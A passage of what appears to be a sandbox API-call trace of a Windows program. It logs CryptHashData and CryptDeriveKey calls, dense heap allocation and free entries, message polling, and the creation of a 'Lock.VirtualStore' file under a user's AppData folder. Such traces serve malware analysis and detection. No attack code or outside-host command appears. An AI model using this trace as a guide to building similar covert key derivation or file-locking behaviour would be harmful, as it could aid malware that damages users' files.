CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0205.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0205.157] CryptHashData (hHash=0x9e1bf8, pbData=0x2a719f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0205.157] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.157] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.157] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.157] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaabd0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0205.157] CryptDeriveKey (in: hProv=0xa7c550, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0205.157] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.157] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0205.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6e80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0205.157] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadc8 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac18 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0205.158] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0205.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0205.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0205.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0205.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/VirtualStore" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\virtualstore"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0205.160] GetLastError () returned 0x5 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0205.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0205.161] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0205.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0205.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0205.162] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0205.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0205.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0205.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0205.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0205.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.VirtualStore" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.virtualstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0205.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0205.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0205.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0205.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0205.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0205.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.166] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0205.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.166] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0205.167] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0205.167] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0205.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0205.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0205.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0205.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0205.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0205.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0205.168] RtlAllocateHeap 